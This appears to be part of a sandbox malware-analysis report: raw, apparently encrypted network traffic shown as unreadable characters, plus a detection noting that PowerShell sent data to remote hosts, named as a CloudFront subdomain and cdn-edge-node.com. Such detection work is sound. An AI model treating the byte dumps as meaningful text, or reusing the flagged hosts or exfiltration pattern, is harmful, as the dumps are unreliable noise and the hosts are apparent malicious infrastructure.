Data received	ÚLDÎ' Ôf5zàøG¿É#Õ\Ðáß{âýÛG~Ìæ¦mº_-0\|óØgüÝ£&]G»àç \Îï³Ö¸0 %Fè±«\|D®öZî~GR9f/ ÝÂMÍ"v+ÄÍ]Æ§8À«GØÂj{o?~9H0é ç¸SlWËC'OºwW&x[p¬°L³ÑÏ¶çnîJ@·¦Þ`t×DWÌ&±,«FpëwêñÈf_¾ÿÇi(^X¦ºi°Ý.aÅYÐÿýUØ5!i!Fx.¦péÉºH&+Ü%}tSU#í<Bè;÷a¾´21éìM1¾ÌÛnAû÷ÞÅt_Öü¦Dv?~µ~µÐí£¦g£±àAõ¦ÿðUÓQzÆ´=Îd 1tG¦¡:aþ¾1HîîkÓ¨¸hx$àM9÷°kÛÂ÷T(TLïïô^æù¡½& 2Î[É#}ó (Ëêg¢HùÐ?û Åm²ÂÇ¢ÜccÔY®V\|6âgFÝôfânÎ³ÐzÚ%CÙ4Âß4ýb©¦^ÓbÄ0q¨ÑÎ÷lM¸i¥ºÑ8«)éãCRmBAm®öw×9jºÂÜK@¸ÝëqJXüi 7bÏ¢Þ3¥O®ÇL³ ÅlÅ¹²0¥(ã$r¼`~YÎÇ7ÀÅ{¬P+$QÕ»ÎqÁ ¼>X¢©GÖµc ?M$WÒÂ]±¶d5sº<ØÌ7{e\Æ`¼PÃ sùDmõ_D\/>v%.ÔÒü0òÝ²0ÛWD»nØÎÄ¹îíWÙr¹N=[«VÁª"÷§sêk ¦æû`óBÐk$"ºÕ¹_£ç0iÓYK1Í´Þ<ÈBF¸ç%ëªµ m$3ã>oU-f ¸Í´ëOD0V^ºÚrÜ¹/ñF~CÏx64Ä2?á»Dæ±ãîCÈñ¶OG3=¨É¡8{Þõ~µ¿©4m: K9=¶µFýú;ç79 uEKÖç"àÑ)¯Ê>(©kGUQ3¥âÃT°9O"¹a¢iifBç¸ \)s¤PrÄúQ>¨©,lYUy7aC;-c¼ÅÀ(dà¯ÁÂmçèD[%kÒáoîµL])Þ\| d±¹¹ü Òõ Âõ·_5Ý`Và¸#qÀÑMzµ1½Tv£ö kúqÐE«øi:çÌ³ l\L r£3âß·D7Á¾¬÷ÚÎGÊéêÂÇÜÿß£ÚÒç¥Ó¢gwXw÷Q{x¯Æ`ÕÁQ¬3uðAcÉV[ÚØOÂ\Yxwþ_`êG äþñHÄùÌ-òqI¤{DÿíÚ¦!hpÈñF¨uZýù©ø¸þ9çG<ýÅí$ù NÔ°ogÛ0mÝL!x¤ñ3ýlcª0'{jáò9G*Ùëz±À`ÕPqUNAÜ¹W°O\|ô]¬´/[Â°ÐÈ-89èsÔx uÆcM¢ µØ2ÃÍpËÃZÜàØ}î8ôÑE:.VûÚµ³Âç,I£Ï>H6s¶4{}î~þKpATÇ[§0>ÎDz?;bÿekIEíÙi¾³ÙÀDPÕ
Data received	ùÄppá+÷UÒ mÆò]]Ýem«÷÷êáYàP`J, W Þz g®tØ$jãµàP>®ÕÎ&+R;nÝÃ7µqÀT TÿÊ¶ãóÆ¯.éÖ²Ü(ÒmªnË£ÔGôJ¨¦PÙÄÃ«eÔn´ÑTíç#¬'w¸@1éÍ¦÷î 1P0Lµ?jSÝOöI+ÙWEYù\_ÿ¡Ô«9Qó8&Û)å¬Ü¦ûxFUtgmbÏþ f©döùûpI½~nwæÌÇå6úçØA¥8Ñ R6YÖE1ûç%\æüÅ¶Ï³ªe§a Æe×P/S éî<°ë1üîå9È½DÅÞ4ó?OB1®ZLGpøZ:PÆ,L¦^ãªìH`Á¬1_1îbª¦VÁ7ÿ¹"ºí¹8%Àûï]RÄY¥ý»×N¸ûö¦îëCÈ4Ç»íCþuÒ$¬???´Ð? µäãm LFûé;;w qFÈ©ËuP¬²ºp)ùÓ$ý+ÝöËeîTe$Fs p¶d4ÊêM1ïtV¼ÃñF/ MÏiä¦$¬ÂÝú·ÆPBÔÃUUÝaªSR}d7ì´³Û3÷-ËÎU «Ço]j/µ´j³(QÕ¡û;Få¸öÚªOÄ°[7ÑS:ª¥XK:AVYræXïpà-Ñh õÅ'æfß¸6,q@fR`½PëöT÷¿%¹niM¦ 6jß9kèü·waàZrk.F·ã>L /NÓD@ërÀÀ¨¼&NÁ!Oà¥eÌç8TnØ]\¸ª'·/®ë¢÷¨m+rýJð«ìè©4ò+Æe,ðÅô=hÇáÌ°Iu[®køTræÉá6ùõÍ÷04÷_<ÅºzU)/;Î¶Ã§B÷U£?ÿÍÚþ¸Wdq4ÿÙä]mç f_XV3_æÞÝÃÞì,,vmáÍVi×^ à7ÏÍB%Ó°rNµÉuäkÐVXÏ]+g¿Ý úf±ß:¬ ÑE U&NF·YìÈf[SSÕâ´;ÂIbÆÀjSÀ££v{ä ;?¥ëK»0²jsð-ÙL¦Æ\|+¾hu%Cç¨Í<×ë,=râ½Ç9slFÄ×2JûÜç_Aû=-j°eÅOí;(t·«ÐÙöç-e¥Ä§ Ê¶´¶µ¤WMuÃA³À9ð &F·©`Ëýb#tøcEx¶átK<õTnø¯D$Vócb{W;_ýEÕH&a- (ücYÒAÝlÏo¯w½Þ'Ýé»ïZþ>X½:5¡ûnOºP:SæO\|;3h'ÓsA×G1É+ÇÑô¨rò=Þcéc¦h×ÈN«?R×KQkÃxi,¬'æõcu2¡Ö¾¢â¦ Úúr£8ó ¾ Ý «©`'¬è³(Û?PáP_üN#p0þR/%án ü±@cß1²GÏ`ð¿V}¿RF×B<MÔ¿nÚ+îV"SÔÎ;.ß"ñK`iTõºnõgýz6ôJìÎÕÐRÈÿFûbi}7Ï³_EÓÖ@¾MéÁÔÙbR° sÚU$
Data received	ºXò÷¦Aö #dP' ^"ØêzR>%fÂì©qmà³ÛZëËôÔå³\Ð%ë°kH#vJt :B!lxýhù!£áë~ «Às#cïï(´\h´wÝì¤Ò{j¡HXN~1µm´4MÐT)¼¯çÅÞùÜhÒ»5Lóz>¾8Ã$Û®dlEÂ®;$h./¾òPTùeÐ5f44)ãßæZ¼Î^«7yMÐ2?y7JGxUÀeXMù)º@3êuÜ«öÓ-/óøÙH}BÊq0§[÷:ÚqÈàagYØ²J"&ÏÐ§Úº#Ñ+)¥ïqý´Ú¢`Ó¢âlówYµ(À(¯Lì[FÉrm:¤y?üCü8.TÙ_ÂlmUnýoÓ 4¹íÃg] Bg>½Ôh»µ1Ý¯½èØhú`õ\|JÅÞ'3ÕÒãE²Ø(B¼±ûáTKR¨ñ[fpòrÔ¼ÖRÁ»þBÿ:-Vb]-özÙÿõÐýÙ)¬~Iíb7ªàs½r«¹¼3©?¼þ!°$U¯·å~dm·Ð¡(Dm1Ý'&×d'µCØÎ]pæÙù&ði9Fqr[+¢Ýæ·iÄÛ}rÏ9îÑÙXÛ¡ÕÄéGz;X_Y°4-}»{&Ú¤ódÇKIÈI¹:ÎWÍY<0Óùr¢Üy)2¬Ë÷è©©ãz2uq=EÜ%s/½§ùpæ×+ }Sþ>\¨}¢ý:9²Z?4ÃGåkBy,ËºøúVóÞ,!Vo¨øÁO$ØO_lDã°ÍÞUÐªe¡ZYÌ!çúGµJU!ZEN¶áZ^;¤m;ÑF"¿@è4i¼Gf#Z© ðæËZc;¾]IÃCb£\FÜâ>lgzT×è¢eúj9ÃÝ"Mt®Ö¼TzØ7ºé)8âÚ+(»f6sF]ÒûFÆYÓIÖ6,Ç¶ä\|¬«Oâd@üÛÒ!jEVì¤Fß¡³ðtGÙÓ6l>-©Éì²ÿ¤]ìðçGÉ¬°o>Ó÷latrDö>wm¯w¸Ci/·\|9KWíª£MôÐ·õ4öÂ±ã±%Ëú§»±#y¼J7 üUü«o£íÎNW&·¯Éö¸@_MØòR'Ç-1øÑB¥òíi¨ÛA÷;Cþ ¾iåËqÊ\!÷»ú< u¡µ«ÿT×iÏ=è£Ì CóÅ)£FÁ!;nIùñªb«:Q/Ío¬ Ý%'_hÙ¾ÕkÚA ´¾>zX¡ø87ÌDKO+ÀúLT¹÷$¿8lÉ!"ôE¸BêÈ. Ã²w>®É¿È¨>èGÆì]p¢òRxDF8;$SIEÀpÙW0>îª#Æ-~Õ*à QH«-ié %ÖÙ]yòeõ&!fD@Pj~u=ßI ¦hW9Ò¨àãÑÏL¬0i©eàø+ÐvÏl´+>?»ðÄÊZáÕl¾Àû$kÜkÖÀW>¥»8»bî#©fþgë^Þ¡8.÷à]CÄ5\|ÛßyÙá%óò\IYx Öxéy^;òXwZ¿kåÔdrªÃvZðÑÙ¯ãXôêèÉvñ9\Ôüeô;F<.ìDæsÈ
Data received	º9³;±ÏJVæÒ2@ý·õ½âÛTI°Â67Ò1\¬³ä8ûããzô³{òÓbÂy?15Pöàk±JiÃ)ß/ÏøùYe Lª½XRÝ¦!¡ý¨ÓÛUÆàlzGÙgob9øGæH¬²H¨8äâÅh¦YÂv¸rô÷þÔÉÚ:hVûY©ñÜ!¼Þyá4¼Û9+¿RP+2Ú¦ (#&ÈñRáòÄÞÜÈA>RuÉ-£âIÐn.ÿ¬T3«¹´nLN1Qç¹nÁ`È2A£qU-iu ·õbH´Ñ:ªj²hõ72m ^·ã¤ÉÃèé°iàNÀð3µi&ÔµrúÛMoÇ,YfäÀf²æ MÃbWÍáËhæ5îBÒñZå·¿@²VÏ¬JT5ÎUHÂ"ÅìPç}j/`e :æÂ®úNÒáNÃ1ðÆmíAF#£sïÍÜ ¥ò¬9þxJTpó±cS+-_Õò¯<Á/Ó¢EnÒªÜ&)Bâwpm]a¨ ÍÜIÜÕÃîMRïj+FÙ îÝ±(©I:e\|hýîÝUUÖ1kßÊ¦d~DP¢NiLU¼c³H§psQ.ÄóÿåvñâÂLvU1[vceäMô¶ÍmdYz\õN±¨Uí5vùÍñ®Úõóë[ÕKÈêt(\K£e·[¹×{À¥ÑX9dÈÞrësã§£V¬0äÁÑéL¥c×ì3ßµõ¡UØ/Aj±@såÍEÂ7DDã¤#?Z=ÌÂÃO +ReIÎý¢nÝÿ¼ZÑzÆ+eè}I_rËm©òO&8ÅÕå?6ÏÌøºEËdÿÁoxáNpÿÃ-óWI¦ÆRÝÖ]¼z@ÂªßÜR=ý·KJ6V2Ù³êz;ÔBâ Ö¹dþN#DF°V\Ë]7Z>ãÇé7PòÏ`ªµÿw@ÅØ¿É_Gä?ðËºîÿ ]÷sX^íLpKóNÌm;¯?(1©UâØ}ClÀ}Ôpûèþ8Ääx"¯VÙûÐïJ¹"]Ð/æì6ÏãVãÁX×;ðõ¢±\|~þÄî$[ÿé\|±Ò5g,~ÖõäuÁÉfR[ô§\ïW»û¼S@ÍDJ¸P1½~¨@ðóBÃÄ ß`¦1Þ$ÑÝèMÁ ß\|ÏgäÝM¦gÁ ç´ïhØv&«¾%T]Û?òÄ)¶BeA&¯üKÊzF.¬çÌ¾V¦Ïgá{¶úÔ1¼x}¹öÉ§ÛõÈ>xÌ£ÀÌ4)3>.ØúÈn¥"Uÿ%M^_FkÈwÂiç¾úö, F«4!å91xhï7þ#ðVô:±.Ä.hP¦¬âézý+G².Ð_}\|þº;Æ=@ÀÙGíHþjÌv ÷p¬»ÈAÊ·:Á:ô¢ºÚ6xÉ¤uOÂOpùoÄ$u ê³ï;,pãx'ûß·ñ µ=Ï1÷ñúTdûèÊÏæÆi~ëã~Wañ`¿Põß8Ø¾ÜéÊ¢F¥AÇHñ³fz£+X8SgdÒÿ·çLêãÑ0'æS gr¡Û\|NºLÌGr=Ø À¦\
Data received	=<Dï¼ UG´ÓË"Ì\h°-etxÈÐRð#@¿¤@Åúø¯±íÃÒÁå1íîäÝ>®ecÓÐr)O¯ßÏçÔU?M0bRNx(ù$À[jºFnZW2aËè¯Q£ö{ùôµbN1Oø7§öÊSQ¢Ee°=ßE¡òèOÎËä8SÂº2ÍÇ~É9 @8güreù^þyaÚÈwAaæS»÷tü5ªâ¬ÅqIÅYÀ¨Ò%ý× IvÙEqfY¹»½íò¡38ØN9I»PþQw+;ÍY+®üjDÕý·:pù·Ð³x=yë³öaü»_5QÙbw^ìíy)G{?\|/pÝÌNmãÓÐéQÌ+×þÂr_! V5@e #6óñý¢S\õÏH_ÖÿzòCU#éôÓðPj=Úb¨ãb¹Ä3@²A¥"^3/î´HÖÁSC,ÖÂþÒ û§Eá\',¦àù:³'¬Q{Ðã¿{Éiz¡äÉî,Õ^iÄ&n°nÑ)jù÷ºGüê\d~:N¨4Õf¢¬%"yÜú±Su§§¶Ö³ý[¢G¡·ÞäT/øýkmLZ$ ÿ2að«£Û§gÙÎeSîýÇw(6 Ñ43§¹{/æù]ÐÇm¬h½¯^OìQçÙ£ûMÚØ¢+·oÈ«Npî»Mohyµ/CFk§P»Ó4íIóâA8V³U;ºÝZVtëèÙj)Þîãáj±B]÷eðÚo·Ù«z°sL["÷ aQS¶:ÆdýN³òZÀg«0äÓ³Õ£V:mFÎÀC³J.¤b·t?w©ßãð¤3l_»ðJÊËHí]\ SM½2ö&WFeð8úÛ;@ÈEÝ³ý ]%¡kâBá¤Ð?(4\¾°4Ã2VCùVD£r«{W?;(ùËáÕ«ÐØºð¹2 zyD Ã¿S¸) '°% Á¡O8 ¡ÎùÎTFi·/úcß£ýJ³áõ~ÚÌpcEÏå[wQu®ò;Z¯_c)?)¨èvØÅ4}§þx3ðbî±¤6Íô@òy(?H9Bü÷çýfËé9ûXGÞÂ83°§zÔì ¹rz ¼¶HÀ7¦4µ:DnÖ¨HõRbKkçÙêdfZUÉHÍÞ°N¶ÉêRE¼qtHÉâN¸¿^Ïö×E¥kYePWc¡©`£ë]Ð.%ÖÅµÛ¶Ïa'Úoñb¤âÍÝKa'v;>B@ß¥0í ðÇììø,µ¨³ÌþIEÍTWöûò<ËÊ#(Öd:ð\|SÅ´Dq&õåÞ¨=ù4ó¬Õ±ò¤ s¦+AjlcEø+ÄÚ·òÍ½Æag%üuèv0î±)ZÿònÇçZ:T:;énÖ¤Üµ©ªÅþ;6ÀÊôÂ¹´ ÍÜC¨E3ó¤6ô=Òû×NS?lráx?>óLTÚG½gÀ>L¡1vØN©¯îè³¼¸§÷Õ)ûå°¾~à'®r¤Å7~àJUîT½Åø®Hf\ u<HZBLÀ_ÕÂ:
Data received	\zÈÉ¢.¸]?×e3ùÐj½miúk åzc¿1Z¬fZ¼Ð}Uº´)ðW Û«Æ.(¬Ð¶Aê½,\³$:¸Ø îð1¯%=x}K59eZeDìj¥ÂÈ·øýÑØ"¾ Muý¤O3ùÍ¬¡¡òÜÎ§òÜ{=Pè°1¿Ä$öXmIÛcXDêIÈ3;a'ylì¶òe3£âíu¯º$d«[{04 cÁgûM5Â/ùÍ ÞI¡£÷æÓRE¹º^ÙBp£Ëð¼Ç!z ÖKt¤@âõÆú¬7¥ð_¦Õ[J#ê0&sé³¹µ+¶+ä^{ Äçâ_ç£LÑ\2N¶Ä#(ìi¥8T%tÅõzî.zQSk!Ó/+7þpól>öïüØ£Î4#'!_ X\|§nèj>nQÇ¤í©æéy!^ðÙ{×éëb÷ºh3& ô¡p- \|_ïfì7dMèS'S¹Ú`ôL$±gTÑy¸}È;ùì¼z%Je,ZBÏÅÊçb«%ÕYîÔÝOºüèÇ»1}kòX<BØcØùÎ"òèõ4ä«Q÷8.\|ckøÒ®ÔEWUÎÓÙÛ)qO}¹ó£ì[î^úúl °\|«8wÏy êGhKÅç_&'9ñþz8R=õeØÆ5Æ\p¿MÐÌûVÄP4f×8HÝAßwSÌJ³ßÂ÷{C&ÖG©tiã² t}ØÆÿÏ(Jø3eÿìÛBQ£$òI 9V¸) Ô±:Ëßñz=ø/Íµ8a!Z=nNÐLÔc®-6¦Ùgwgè§¢Gè»qÚæÀ±3æJ·ÜÔO6cbO:ôã¼å£oA ´Ú{'ýô¿ÎLÛlDD¨lmáôPmãþ ö$¯Ç:µ¤nBkwÿ07p s4©àý~2ál,e=Õï½ÌI»Pkc?¤2ïf_I¤&}1TåýB%ÚpfÕÔ"=ÄàsË³ç¨×é·Øg¿?½ a'çÁj\\rÑÞtõÏ\Tî86Òñ[6kþÔ´¾õ`på£Ä âôhuÊÎÅS~dµ>º )ÝÈ¸Ç0NØ¥úQYs.S²áe«:d&©å/ô®6DÖGlûºÆûOnµúÈvR :q:-j´ß ôã¤(Ø äL?'ü®ú$QózÞøT+ÀzÿÒÝçÚMb1áF77NMqa&%GGU,ÍØi °(t7él¬_¶co(3Åù:Xh>ÆÐ lä2güÌîpQíäc¥8ënKú£´Kh%Ë=³óoÔãZ§µ2ùlN=ºWr©ÀÀD=¼êõ3ô$[§8F«QÝÕ/Â:Pzv¦¸nà_ DDHè»sõ²ÃÂ¢XB]QÅ;%j=ÃÞ¤³õIÅ7æCk¾dâ´36ü9°Ò+5æ[Ò,gjI ý#¾$¯_¹ÀØ]_=ÈäîØ«{aK{(:Kòm',×ÐÖäÎc×¿e³¥Â¡2×I>G82³³»üF÷2à`ÙÂØ÷f
Data received	fªEÑF1ã²ÅñÅæ»@,¾gÑÈ3¯°ªñ#Eñ%ï¤C¶Ç¦aØìüÄMæt{1jÛ°ªxD°vp7%µ ßßUÞ4Ôx÷[Óøµ5÷Ì<QañyzäÒNÅ¦¢aáléi³T·IµÌ¬«²1Ô³×-édÅ{íKYÞ¢B<©}jò¡åü¼ã $§çqÓU^´5Êlü6ÿ@¢ÀçÝ°RÃo#"´¤ï[-ï»ZíUÀ C$3 ³ÕÅ5vî62ZrêÌ®î àRzæë°©ÀûùJJTAªRW{ò þI7( êÆ±cw#x·kFPé$/½ßPçÝèb_§FW0µÃÌTuÞdÆ´KÉØeµÌ)¡[Haì<ó4QÎ£rÔ]÷Í çtÍdQ¡CÐñË¬ÕÛ,<cdz¾¾àKÛCK{x0øV¤j+3ìÝ®«ë\|Üñ×3WdPû¸ËUg`S¼ÝtÊÎX³GNU[Ç(òTå´E 9e/"§ÕX7UçjzrGÿ±ê%¶ÒúRæñW6&Ê·uÅ»½½³ õj0ä½FââªOn¶Õn.ç³Ù·(rî²L!F¿ÚÌ)©ª¤hBñïÔÊf¶m& Þ×ä¡m7ÅÓý¹J±% mÑXAq9¢(B]ÑâÔ5Ý\| ùäæzÆ zßß{ctÈ)s¿±[õºöò4¡Ó~/Ý^?Ñô&X âlËsÊøìM£(ë¢ö§ÕàÆ;@ôø° Í@±8[Éä!ìB»ó7ÖnRæ`xiæÀ7 Ýè8Çù">\|% Ð°ÃúÈIáÝÑeÖµãô¨:ÐÄïvëæû^×juHÇ¤iÞu'dÃ`3B¥<47ÇRQ7ãzW¦ MÜÔþÖk618; ãY¤4ÄÆ3Ñî-ÆÎê9ÿh ú²ÒÒØíé 7ýBºcTóî°Ö-µãcô\!üÈ9¨¿×l3ä®¡Rf°¸¯½áÿ2ú.¹jy ÔÑ6î%Jl°Ýaþ7éîþÞÔ"2©·¿är;Úb\|Ð;£ôFÝkê cñ.-»«§w <W0Qò¶>róù 3oÜæë¿kGáv ÍêÈù>0_y )ìr¹u9±Ý½Û4 ±X7ö·ôpå¨ÇÛôS;#ª[`z/ÌShYM¼#½ÂmRIrë\| Ñ"téÖÁ¬CôG&äÞ¬£MñBø"¨f .d\|{Ò9;;SB §ºBìcg4o<'àC?P½¦äÑâ®¬Bô³>ùFy÷¿«ñíxÖ»ÓØHK¥u7°á'ÎsÎS¦>¥ÏHGÏìH¯¶lw®J6- @~7ïu¹ô'>V=Pa0Z+°£ÿ÷½¶bÊ¶Þ#ï¡«©ÁÅ«ÆàÚ2\-ÚQ¡>-³r:vfîzðFÔ#Se`kî{%éhwMÿwØ9Ç°W)d#¥¡©ÍwðýJ>ËU)ob E¢a¨9'CGèCmÂc»Õ¸Eµæ64I¼sEÛÕÂa}Na[¤ùÈã'
Data received	úa\õãÉÌO={62¡èj~¥yi$®ÆïM«øÞªJp~¸{m)°Ï±avÆûþêÐ=Ï~òå;¾ßÇðÙð´b £²Pol-O+Zkx7èbTæ3 SW/Ìåêäp`Òûüø\|<NþNð~¼(-òJJïhúr\|y<iÓß[ï'x_D§·ÞÓG·ÿëÙàoæþQeÀ= Ê?Uä·Y'NE2ÚeS×zò>ø=cë]àòXYBz¥G5,æMNã:àChò H®Ìÿh>'U¦ûgDqÈ§[Ìß¾HÓùùLãÜ9F§Iíso»n©a$ _.:QI»øKükBéÜÍäökÉ®ú¤$%[U°ôÞmÇDf¼%î«Ô:¤1C×Ô<z%3£Á<52if¿û·²¯f'é»¨Þã¥Úc3(}(¥÷1Ïâ6g<s3A¼²á¾õ.¸ª;k¥üÂú,èP£UEä:¤!Ë´ÏÞ$÷/û»üøÔ?Uáãù¯s¿Ü^½¢Ycé³í4K0iy¸V\àH¡Ü.ÑV:Ý)ùþÚ7¾èáÒ}"±~¿Ùc0ù>xoº{ÛÆÝ%ÍKâ&3 [¹QóÇ8z£f¡:E=D-´jyõ âÕpgîWÄÈ¨kéSÁd èçM:¶x¥B$Ò9tÌÎy\é)kxP½B¦f4¾]µÙ¼ÍÍ02WÃmEpÌËné\|&¼îyZ²Õ×¢¯çmÉ7xÛÙ}S®Âf¬î _Ó +?§¾LÔú&î[A=·ùkÂWpÔ×S#>¯ç->Óÿ^Ì¼St Ù@Ði$ ûà½H ùþ,s_²GÁ8Ðê;ª7§«¡/ ï8ã¦ç§\|½Y§¯éÎpuÅAx¹¡¹6sÓÍUhLR±Ç®/§MõB]6ù´söH½åJ@>³9Ix¯Ndê\|-ÊwÍ6æÉCjê Êt\%ÏjºV¶ÍÄ¶?@/úØ¤Nþì¼®ï«BáÁãÞðÓGcH;ÜSU2Ú».QeZÆþ»¨Û j)QÀµq\|Ì ÓÍ¶ôïì}úMá'BIaÆd¹O¾"Ýþk¨-CÐ£?: +Üî$ôpRUz@5ôÒÔÏ0CÑ+w¡Xg9-²É.ò§äUò£þ á¹>H8CsV¸µã ÙD¬®ë59ë¬¾Hã1<ÀF/QR¾ª'Ê^FÔçe^qí¥ÎÇ§þwNç`_+\Ôéùr<lÂDÇëW2"e¹¦C,B(U¼]Lô+úÌa~xrÖ1×ï#¦¢Klm8®sÑ}¨²z9oZíNÏäwµ£Þ@Pw³j(ºz&SË¿Ìéýæ§ÍvLûñ©^®ù³mü¸§vÚOEV¿2ÏÑo_±_±¸!Bç¶4¨Ôö[gBß÷7ýrÜ©Íg )'ï6å×-ßM`Ð"öògªDÉ~ç n,âlpÂjÐÉVìufCÅÉnûSç]&ë/RãÓbàYé>º(*5¯=°JíF"¬Ì{
Data received	Ð
Data received	ñÔoº2aÀ=§\î¿ÝñvÿóðO2¹Îìm£lf¤Bßuï"«çHDëÈw>µO3ÙÈÃåúW»ö¥U}ð^¿/¯Ê¼Z4ín>;ÆÒ3ÊË`¾D0GîøF`TTÎpD¹Sº¦j¨\|ÈfÕeO ÓStÒ®¯?ó¼S÷>ô òÅ²(rkiW±nrýÐèa¦v ¦Pa2«A$vMö¼é¨^H\|ÆyFB%ZµL çbªKSïm¤».ïØp¯t¿öwætn(]0¬Û°r/Â?9Ó¨w³r_øî¢j%7¹ £tOzø¨ÁÜ÷¦®YÎs®á,W\Ñ/µÝÚDÃg®xØEþßxªpjÜ÷ívª¬ï>^O×ÞûÈ¥6ìQû4½b`{Ä¿ÑÜ¶¶Zæ%Aõ¡¢4yôP[Í¬}MA/·TßïV§$!6DQ~¼ ù6÷DMw4©Ç;6Z T¦Éú%f²çeóËt=îóåù9»W ±=>8túÀ2=mb &$Z%\|®µx¹)ÎÈ)BÜÂèC+ÂFRþ~Y]ýí`Á$Ñ:òú1¼Iï¨Ø«ÚétÃêEÿÌ¢jÍd\KíÑÿK§p\|8ñß=ó^Ä9CË5âÏÎ(8Í!SvÛ ´j¥gkBf/>#£ô³úÈåRa%fË_È[²6.ï7²ÃÉí°¨Ã}&7!è8\ÑØÌÈÓ2bãì¶±<N>³cÆ&I&>[äúy²p ®÷ý:W$è³Á+Öþ9¯xÔ¡4û@ÍÊ 6@¶}å8)ÉMÄ^u¨úifgÁ'â@JFcmKÔÅ½ý¸EG{ÄPIs1b0ºÍFHenZb7?,N¨èA/D.¢^¿áÿY\|ú¦OGÁFÍrrÎ¡À9^j§ºèìj]øBhcM ÂôQCË±AÎûá¹ª¾mï6WÎ<zøÙñ_R&Cü£&£Ðv©H0ÊMÚÔÙU#ÀBn¦Ô7r(OÂÐ Æ Èßw-®ò!CEc;§W÷aÿ{ :7ÂøÚM'½%8>F'¤ÝHáyLªXpúÚá"L¬7cp®¦NN=ëÀMô³UÄlúUñFa øË$[Õ©Á ¨$Øé¾ï©y½¦ïÐ_í±ø_4ûu-FòWh@qÎÔªÒv[ÞÊ_×eº;¥¬íµ ÷u¿+kÑç¢b>¬¤ÖPÞBjVÓ(½qbó¹=Â\'Ý4SyÍ$¦üÒ]¡FHÃgÉ¿d¿ËsØ,½½µ×[óFMôùÐumÂÐéâLY;(âÛ>Ì«öìûgÒóí9¡.N4®n,¶ù¯bûNÇâdX2J³~Sv²3' kÅ´fú x7µwÆ¿½¸íEhÏéÏ&:¶
Data received	T¢iÍU¼`¢ñQñ¥#5L¹ÓÃ8ÏoJ>CÑ{¶BppË4cø/ °ò#£R.¢øêÂ´ÃÄÏ8Kr0KY.yY¬×îÀíû¬1t4F8çTJµ.íÿÔ(ÈFq®ÿMÛûR«ª¿Æ±Y4«ÛY¡ÉÌXñÅoµ«i÷U¿À!ï_Q oI: wÈ>e¾_@Q¨AÖªHlRú4å8ádTÒÞ·öm¥ XêVóµé8ö6}1¶¶ði?WÜx1Å ôÝüÚî¹;ãFêµ,±äªO· Þ´Rh¢µJ èoWö&!)HfîÕ8Îº8êõ/«%DÃmÊ-ébI\Ø½©DÓek,ï)3Gç¯½Ý!ÃyWÝKâ+-÷rM]mÕ+;ÔÚê1s¨¥héÒÙ×[ÐZ°ª+Xh©%ku'£@ÕâèË!iÀ×PèÕ9~P~}Ø5S+ÆÂüÜLË²l®ÜïZÜÈh¡¿4X:¶&H½>ÀB½àdûYpÓ»»wNgÀ,âx/uKü~oêí7)r¡ËùþDewJz~Ðè#14gàÑÕ/ñô½ÍÌÑ:I+9Ý]$ì UVs8ü²ÙË+»D3?Ç1©ÙêØî;1¼\~4>´éÀÀ¿Lïß·Â ß'¢7øàVm»\~,àÚÇë÷ªæ9Xçñ>@Ä´ßd¾ù 0¹²i¯@vÆ¨ÓÎêÈ Õ·Jí©0\|ß]·Ï CéN÷ë©ÏJþbÌR îI¿"ÿH3 eïgc,Tp%G7Ï7èñPsW¹hÌ^aÅ¦AsÑyÃO:lHÇ#?Yê÷ªy;ÜKñB¿$RÅ[ì%Õ]õØÒÆÜPIZÂ;-üý÷dÛIæ÷(==âò¢4DºÃl\|%»¸gòMÙÍñÍ äduÅÝTÎhÆ×h³?¯ÒIµrxÜþ;Yß£Êïß×º¤Ø8¿pXq>}í§UÏç©ãFä{UØ5WU^`J%}H7á}2xaÂ·ÒN[ Èa-TFaÈß=sõï\D4z..æä£VÅò/ýýã¾<-kÈ&Ïc#B#ë[ójÆ¨!È1dû_´ÀODÓ%Cª"7üÞ1i+ÒW¨O=ºfG~\|dHp ôb$ïë2¹«FtGðV=!}si½DÕ/óÕýbBl¸»@Ð.éeìKÔ=!<÷¨vKðX:Ôþuöd7 ÷<ü{w3NéÀC.Ryt?Æº%ÜS°Gè]^ È¶¼« ¥[ÒaNÅ;gP³ËYQ;qóFZ6jÉ9áq[Pû!zøã\|Ñê{{kÃV¾\|1" »4T¤ûËS»Ä}rKSP uãËïÒMkËVNV¥mkiÅâ{<vÚ£Àc¸ì§Õ¸2ºÿÚiÄàûFè>þ¹Î2Qk²Ós27·\|]»ÚFÝö¬_,móvÒ5A£û¾+× ÍÐõd¬¥ ô'Ñþ)ÙjFô^@¼`ôiÄ\Û¥øw(¢Òü¡*Ï±ã×ôËÿ¥j·}5Ð!fê£Än"ÏÅ/Ëq`¿P¶à

Poweshell is sending data to a remote host (9 events)

Data sent	\|ffP&j °ýnÙd-~Gëþ4F¿xinÆ/5 ÀÀÀ À 28;ÿ" d22hce23hy1ej9.cloudfront.net
Data sent	FBAä³ùû'enÔÿ"!¨ÀËtÄôdÓ0ê§@UêpçåXg k!¦#IZÃHÙkL'È0*ð×Î[nÊÃI³ßÓY¹S¢ y.Çß©ý¯4¯ÖØoVÀ%K`Ýi
Data sent	f4gmÏjuÒýQÂ§*¡±/#'N¯½µ+#U ¢çÚ%Ýñ¹o&cÑõcV»¶¢Êz ÕZüökCÄrð¯MþZK³P#8½òì¿otÊIÐf@TÎ®I¸Ònèúm9«$?
Data sent	\|ffP'n¿ßô¹ZÔ¿YO BþdÐËè,}Ü¼/5 ÀÀÀ À 28;ÿ" d22hce23hy1ej9.cloudfront.net
Data sent	FBA[Öõ·éÛVvÍlçwg¥ M³áRç,W^©uçG#Î8ÔëXl¥ÏéwZkIYÆ,%µv´àOì v\0îÿZÎ_ûFóãaO2 ¡Ø?~Iw'9ÚsÆÆ:OûLß^îr8'}l
Data sent	4±^o7ªQÚj:;7Á*ÀjW¸ö¨ðöðÆ=Î\|,¤ÍV¾«mJ^Ða«WÀtgìx¾n)UxL¢¿õ^3Ú¦õççÎ@N~Dl;úøî½%¸Ñì¤-PÀíÜ¬ÅþÞsÑ(\|'~59¢ìQI,j1Õ)©
Data sent	tpffP(+þ¯SpÕß·Í¥.}'ñAÍ$¿iba/5 ÀÀÀ À 28/ÿcdn-edge-node.com
Data sent	FBA©õtHËOÌ¤ÍØ¥3îâ6åL åv\hÊ¼afÍc;.ë;ð¥æ\1º"ü[hÒb0WÙÛ´£ý?5êÃ«p*Ïé´²eIªÃj-'LtÉü
Data sent	pðçEjÎ\|/jFØË}l @ºØª¢³ã6Ú[ÓÆË/!ÖQÜ¶±2ï¹ÆÃ¬ÈÚgr¥ÅÔÖp1q©È]ñ Q6ÐqÜ)yÁÈ&"s,ÑO5NEà=jëÙÃÔ9í²;

